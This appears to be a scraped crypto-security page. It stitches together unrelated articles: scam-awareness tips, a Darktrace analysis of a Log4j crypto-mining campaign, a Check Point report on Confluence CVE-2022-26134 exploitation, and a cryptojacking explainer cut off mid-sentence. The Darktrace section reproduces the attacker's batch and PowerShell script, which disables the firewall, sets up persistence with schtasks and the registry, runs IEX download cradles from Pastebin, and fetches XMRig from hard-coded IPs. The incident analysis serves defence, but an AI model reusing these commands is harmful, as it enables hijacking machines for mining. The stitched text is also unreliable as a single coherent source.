scammers trick cryptocurrency investors is through fake apps available for download through Google Play and the Apple App Store. Although these fake apps are quickly found and removed, that doesn’t mean the apps aren’t impacting many bottom lines. Thousands of people have downloaded fake cryptocurrency apps. Fake celebrity endorsements Crypto scammers sometimes pose as or claim endorsements from celebrities, businesspeople, or influencers to capture the attention of potential targets. Sometimes, this involves selling phantom cryptocurrencies that don’t exist to novice investors. These scams can be sophisticated, involving glossy websites and brochures that appear to show celebrity endorsements from household names such as Elon Musk. Giveaway scams This is where scammers promise to match or multiply the cryptocurrency sent to them in what is known as a giveaway scam. Clever messaging from what often looks like a valid social media account can create a sense of legitimacy and spark a sense of urgency. This supposed ‘once-in-a-lifetime’ opportunity can lead people to transfer funds quickly in the hope of an instant return. Blackmail and extortion scams Another method scammers use is blackmail. They send emails that claim to have a record of adult websites visited by the user and threaten to expose them unless they share private keys or send cryptocurrency to the scammer. Cloud mining scams Cloud mining refers to companies that allow you to rent mining hardware they operate in exchange for a fixed fee and a share of the revenue you will supposedly make. In theory, this allows people to mine remotely without buying expensive mining hardware. However, many cloud mining companies are scams or, at best, ineffective – in that you end up losing money or earning less than was implied. Fraudulent initial coin offerings (ICOs) An initial coin offering or ICO is a way for start-up crypto companies to raise money from future users. Typically, customers are promised a discount on the new crypto coins in exchange for sending active cryptocurrencies like bitcoin or another popular cryptocurrency. Several ICOs have turned out to be fraudulent, with criminals going to elaborate lengths to deceive investors, such as renting fake offices and creating high-end marketing materials. How to spot cryptocurrency scams So, how to spot a crypto scam? Warning signs to look out for include: Promises of guaranteed returns: No financial investment can guarantee future returns because investments can go down as well as up. Any crypto offering that promises you will definitely make money is a red flag. A poor or non-existent whitepaper: Every cryptocurrency should have a whitepaper since this is one of the most critical aspects of an initial coin offering. The whitepaper should explain how the cryptocurrency has been designed and how it will work. If the whitepaper doesn’t make sense – or worse, doesn’t exist – then tread carefully. Excessive marketing: All businesses promote themselves. But one way that crypto fraudsters attract people is by investing in heavy marketing – online advertising, paid influencers, offline promotion, and so on. This is designed to reach as many people as possible in the shortest time possible – to raise money fast. If you feel that the marketing for a crypto offering seems heavy-handed or makes extravagant claims without backing them up, pause and do further research. Unnamed team members: With most investment businesses, it should be possible to find out who the key people behind it are. Usually, this means easy-to-find biographies of the people who run the investment plus an active presence on social media. If you can’t find out who is running a cryptocurrency, be cautious. Free money: Whether in cash or cryptocurrency, any investment opportunity promising free money is likely to be fake. How to protect yourself from cryptocurrency scams Many crypto frauds are sophisticated and convincing. Here are some steps you can take to protect yourself: Protect your wallet: To invest in cryptocurrency, you need a wallet with private keys. If a firm asks you to share your keys to participate in an investment opportunity, it’s highly likely to be a scam. Keep your wallet keys private. Keep an eye on your wallet app: The first time you transfer money, send only a small amount to confirm the legitimacy of a crypto wallet app. If you’re updating your wallet app and you notice suspicious behavior, terminate the update, and uninstall the app. Only invest in things you understand: If it’s not clear to you how a particular cryptocurrency works, then it’s best to pause and do further research before you decide whether to invest. Take your time: Scammers often use high-pressure tactics to get you to invest your money quickly – for example, by promising bonuses or discounts if you participate straightaway. Take your time and carry out your own research before investing any money. Be wary of social media adverts: Crypto scammers often use social media to promote their fraudulent schemes. They may use unauthorized images of celebrities or high-profile businesspeople to create a sense of legitimacy, or they may promise giveaways or free cash. Maintain a healthy skepticism when you see crypto opportunities promoted on social media and do your due diligence. Ignore cold calls: If someone contacts you out of the blue to sell you a crypto investment opportunity, it’s probably a scam. Never disclose personal information or transfer money to someone who contacts you in this way. Only download apps from official platforms: Although fake apps can end up in the Google Play Store or Apple App Store, it is safer to download apps from these platforms than elsewhere. Do your research: The most popular cryptocurrencies are not scams. But if you haven’t heard of a particular cryptocurrency, research it – see if there is a whitepaper you can read, find out who runs it and how it operates, and look for genuine reviews and testimonials. Look for an up-to-date and credible fake cryptocurrency list to check for scams. Is it too good to be true: Companies that promise guaranteed returns or to make you rich overnight are likely to be scams. If something seems too good to be true, tread carefully. Finally, as with any investment opportunity, never invest money you can’t afford to lose. Even if you’re not being scammed, cryptocurrency is volatile and speculative, so it’s essential to understand the risks. What to do if you fall victim to a crypto scam Falling victim to a cryptocurrency scam can be devastating, and it’s essential to act quickly if you have made a payment or disclosed personal information. Contact your bank immediately if you have: Made a payment using a debit or credit card. Made a payment via bank transfer. Shared personal details about yourself. Crypto fraudsters often sell the details they have captured to other criminals. So, it’s essential to change your usernames and passwords across the board, to prevent further damage. If you are the victim of a social media crypto scam, you can report it to the relevant social media platform. Depending on where you live, you can report frauds to the relevant body in your jurisdiction – for example, in the US, that would be the Federal Trade Commission. Other countries have their own equivalents. The number of downloads The number of times that an app has been downloaded is usually an indicator of how popular it is. Apps from reputable developers typically have millions of downloads and thousands of positive reviews. Inversely, apps with just a few thousand downloads require greater scrutiny. Confirming authenticity by contacting support If unsure about an application, contacting support through the company’s official website could help to avoid financial losses due to fraud. Furthermore, authentic apps can be downloaded from a company’s official website. Cryptocurrencies are underpinned by relatively new technology, so it is only natural that there are teething problems when it comes to use and adoption. Unfortunately, in recent years, black hats have targeted naïve crypto enthusiasts using fake crypto apps. While the problem is likely to persist for several years, increased scrutiny by tech companies is likely to temper the issue in the long run. Literature: Investigation of Cryptocurrency Wallets on iOS and Android Mobile Devices for Potential Forensic Artifacts Angelica Montanez https://cryptodeep.ru/doc/Montanez-Angelica_Final-Research-Paper.pdf Summary This type of fraudulent activity is not only prevalent at the moment, but it is also on the rise. Every day, a growing number of people fall victim to this. Users should always be cautious and suspicious of phishing scams. GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/EkU8YhB91MI Source: https://cryptodeep.ru/crypto-wallet-protection Криптоанализ
-
- Закрытыйключ
- Криптография
-
(and 8 more)
Tagged with:
-
CRYPTO DEEP TECH Background on Log4j Alibaba Cloud Security Team publicly disclosed a critical vulnerability (CVE-2021-44228) enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by attackers connecting via any protocol such as HTTPS and sending a specially crafted string. Log4j crypto-mining campaign Darktrace detected crypto-mining on multiple customer deployments which occurred as a result of exploiting this Log4j vulnerability. In each of these incidents, exploitation occurred via outbound SSL connections which appear to be requests for base64-encoded PowerShell scripts to bypass perimeter defenses and download batch (.bat) script files, and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts. The attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMWare Horizons servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. Following successful exploitation, the server performs a callback on port 1389, retrieving a script named mad_micky.bat. This achieves the following: Disables Windows firewall by setting all profiles to state=off ‘netsh advfirewall set allprofiles state off’ Searches for existing processes that indicate other miner installs using ‘netstat -ano | findstr TCP’ to identify any process operating on ports :3333, :4444, :5555, :7777, :9000 and stop the processes running A new webclient is initiated to silently download wxm.exe Scheduled tasks are used to create persistence. The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ schedules a task and suppresses warnings, the task is to be scheduled within a minute of command and given the name, ‘BrowserUpdate’, pointing to malicious domain, ‘b.oracleservice[.]top’ and hard-coded IP’s: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080 Registry keys are added in RunOnce for persistence: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d In at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent only seen during this activity it is suspicious. Following successful exploitation, the server performs a callback on port 1389, to retrieve script files. In this example, /xms.ps1 a base-64 encoded PowerShell script that bypasses execution policy on the host to call for ‘mad_micky.bat’: Figure 1: Additional insight on PowerShell script xms.ps1 The snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download: Figure 2: Log data highlighting mad_micky.bat file Additional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses located in Korea and Ukraine. A connection was made to the Ukrainian IP to download executable file xm.exe, which activates the miner. The miner, XMRig Miner (in this case) is an open source, cross-platform mining tool available for download from multiple public locations. The next observed exe download was for ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4). Figure 3: Additional insight regarding XMRig executable The connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes running tasks associated with logging, including SCM event log filter or PowerShell event log consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The log deletes were conducted through scheduled tasks and WMI included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer. Config file (no longer hosted): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’) The second file requested from Pastebin, though no longer hosted by Pastebin, is part of a schtasks command, and so probably used to establish persistence: schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” /F /ru System The executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this cmd.exe and wmic commands were used to configure the miner. These file downloads and miner configuration were followed by additional connections to Pastebin. Figure 4: OSINT correlation of mad_micky.bat file Process specifics — mad_micky.bat file Install set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup” looking for the following utilities: powershell, find, findstr, tasklist, sc set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log” if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK) set port=10001 Preparing miner echo [*] Removing previous mimu miner (if any) sc stop gado_miner sc delete gado_miner taskkill /f /t /im xmrig.exe taskkill /f /t/im logback.exe taskkill /f /t /im network02.exe :REMOVE_DIR0 echo [*] Removing “%USERPROFILE%\mimu6” directory timeout 5 rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0 Download of XMRIG echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)” echo copying to mimu directory if errorlevel 1 ( echo ERROR: Can’t download MoneroOcean advanced version of xmrig goto MINER_BAD) Unpack and install echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6” powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)” if errorlevel 1 ( echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” set LOGFILE2=%LOGFILE:\=\\% powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” if %ADMIN% == 1 goto ADMIN_MINER_SETUP if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” goto STARTUP_DIR_OK ) if exist “%USERPROFILE%\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup” goto STARTUP_DIR_OK ) echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)” if errorlevel 1 ( echo ERROR: Can’t download tools to make gado_miner service exit /b 1 Detecting the campaign using Darktrace The key model breaches Darktrace used to identify this campaign include compromise-focussed models for Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server, and Beaconing to Rare Destination. File-focussed models for Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations, and Compressed Content from Rare External Location. Cryptocurrency mining is detected under the Cryptocurrency Mining Activity models. The models associated with Unusual PowerShell to Rare and New User Agent highlight the anomalous connections on the infected devices following the Log4j callbacks. Customers with Darktrace’s Autonomous Response technology, Antigena, also had actions to block the incoming files and scripts downloaded and restrict the infected devices to normal pattern of life to prevent both the initial malicious file downloads and the ongoing crypto-mining activity. Appendix Darktrace model detections Anomalous Connection / Application Protocol on Uncommon Port Anomalous Connection / New User Agent to IP Without Hostname Anomalous Connection / PowerShell to Rare External Anomalous File / EXE from Rare External location Anomalous File / Masqueraded File Transfer Anomalous File / Multiple EXE from Rare External Locations Anomalous File / Script from Rare External Location Anomalous File / Zip or Gzip from Rare External Location Anomalous Server Activity / Outgoing from Server Compliance / Crypto Currency Mining Activity Compromise / Agent Beacon (Long Period) Compromise / Agent Beacon (Medium Period) Compromise / Agent Beacon (Short Period) Compromise / Beacon to Young Endpoint Compromise / Beaconing Activity To External Rare Compromise / Crypto Currency Mining Activity Compromise / Sustained TCP Beaconing Activity To Rare Endpoint Device / New PowerShell User Agent Device / Suspicious Domain MITRE ATT&CK techniques observed IoCs On May 31, a critical unpatched vulnerability, which affects all confluence server and data center supported versions was reported to Atlassian by Volexity, a security company. Atlassian warned their customers of the critical vulnerability on June 2 and issued a patch a day later. CISA added this vulnerability to their list of Known Exploited Vulnerabilities on June 3. Check Point released a dedicated protection to prevent an attack exploiting this vulnerability and advises customers to patch the affected systems. The Vulnerability The vulnerability in the Atlassian Confluence and Data Center, designated as CVE-2022-26134, may lead to an unauthenticated Object-Graph Navigation Language (OGNL) expression injection attack. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI. Figure 1: Malicious payload that exploits CVE-2022-26134. In The Wild Exploitation Check Point Research (CPR) researchers noticed a large number of exploitations attempts since the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. After a few days, the attackers started to use the vulnerability to download malware to the affected systems. Among the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows. The infection chain depends on the victim’s operating system. The Linux OS Targeted Attack The attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim. Figure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload. The base64 string decodes into another base64 encoded string. Overall, researchers had to decode the string a few times to get the actual payload. Figure 3: The decoded base64 string. This script downloads a bash script file called xms from the remote C&C server to the victim’s tmp folder, executes it, and deletes it afterward. Figure 4: Part of the malicious xms script. The xms file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot. In addition, a network connectivity test to a[.]oracleservice.top is performed constantly. In an attempt to spread to other machines, the script searches for ssh keys and tries to connect. It then downloads the xms file from the C&C server and executes it. The script downloads an elf executable file called dbused to the tmp folder in various remote IPs. The dbused file is packed using upx to avoid static detection. The elf file is a crypto miner that exhausts the victim machine’s resources: Figure 5: The dbused process exhausts the system resources. The Windows OS Targeted Attack The attacker utilized the Atlassian vulnerability to execute a PowerShell download cradle to initiate a fileless attack from a remote C&C server. Figure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands. The lol.ps1 script is injected to a PowerShell memory process. The script verifies the processor’s architecture, using wmi to check whether it matches its requirements. It then downloads an executable file called checkit2 to the tmp folder and runs it in hidden mode. Figure 7: The lol.ps1 script. The checkit2.exe process spawns a child process, called InstallUtil.exe, which connects to the C&C server. The InstallUtil.exe in turn spawns another child process child process, AddInProcess.exe, which is the crypto miner. After a few moments of running on the victim’s machine, the checkit2 process terminates itself. Figure 8: The checkit2.exe process running on the system. Figure 9: The InstallUtil.exe process running on the system. The malware downloads a new copy of itself, with a new name, to the Start Menu folder. Figure 10: The cloud.exe file downloaded to the Startup folder. The crypto miner now runs on the machine and exhausts all the system’s resources: Figure 11: Crypto wallet information. Attack chain Both attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The attacker executes commands using the Java execution function to download a malicious payload to the victim’s machine. The malicious payload then downloads an executable file according to the affected OS. Both executables run a crypto miner to utilize the victim’s resources for their own benefit. Threat Actors The a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “8220 gang”. Check Point Protections: IPS: Atlassian Confluence Remote Code Execution (CVE-2022-26134) Anti-Bot: Trojan.WIN32.XMRig IOCs: 198.251.86[.]46 51.79.175[.]139 167.114.114[.]169 146.59.198[.]38 51.255.171[.]23 a.oracleservice[.]top d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e 2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0 4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9 4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0 Monero Wallet: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ Cryptojacking explained: How to prevent, detect, and recover from it Criminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it. Cryptojacking definition Cryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins. Regardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice is slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills. How cryptojacking works Coin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain. “Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed a recent Investopedia explainer on how Bitcoin mining works. “In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.” Earning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time. Cybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker. Cryptojacking attack methods The attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today. Endpoint attacks In the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps. The most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. It runs in the background and sends results back via a command and control (C2) infrastructure. Another method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers. These avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below. Scan for vulnerable servers and network devices Attackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they usually are usually higher powered than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices. “We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. “Hackers are breaking into networks and installing malware that uses storage to mine cryptos.” Software supply chain attacks Cybercriminals are targeting the software supply chain by seeding open-source code repositories with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user. Leveraging cloud infrastructure Many cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. A study last fall by Google’s Cybersecurity Action Team reported that 86% of compromised cloud instances are used for cryptomining. “Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote in a blog post. One of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems. “The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security, in a blog post explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.” Why cryptojacking is popular According to a report by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners. Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals. When a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure. Real-world cryptojacking examples WatchDog targets Docker Engine API endpoints and Redis servers A honeypot from the security research team at Cado Labs discovered a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propogate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns. Alibaba ECS instances in cryptomining crosshairs TeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. Researchers with TrendMicro in late 2021 reported that this group, along with rivals like the Kinsig gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Computing Service (ECS) instances and disabling security features to evade detection. Miner bots and backdoors use Log4J to attack VMware Horizon servers The Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022. In one marked example, Sophos researchers found earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of crypojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots. Supply chain attacks via npm libraries The software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software. A few months after that report, researchers WhiteSource (now Mend) released an additional report that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior. Romanian attackers target Linux machines with cryptomining malware Last summer Bitdefender discovered a Romanian threat group that was targeting Linux-based machines with SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. A report earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software. “Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior. CoinStomp uses sophisticated evasion tactics CoinStop is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of the he /dev/tcp device file to create a reverse shell session, explained Cado’s Muir in a report on the attack. Cryptocurrency farm found in warehouse Cryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. Last year Darktrace analysts highlighted an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network power, How to prevent cryptojacking As it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can help prevent cryptojacking from running rampant on enterprise resources. Employ strong endpoint protection: The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extension to minimize risk of browser-based scripts from executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond. Patch and harden servers (and everything else). Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities. Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks. Use software composition analysis. Software composition analysis (SCA) tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts. Hunt down cloud misconfigurations. One of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications. How to detect cryptojacking Cryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. The following are some additional methods for flagging signs of cryptojacking. Train your help desk to look for signs of cryptomining. Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices. Deploy a network monitoring solution. Network monitoring tools can offer a powerful tool in picking up on the kinds of web traffic and outbound C2 traffic that indicates cryptojacking activity, no matter the device it is coming from. “If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” ],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method. Use cloud monitoring and container runtime security. Evolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats. Engage in regular threat hunts. Since so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations. “Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of 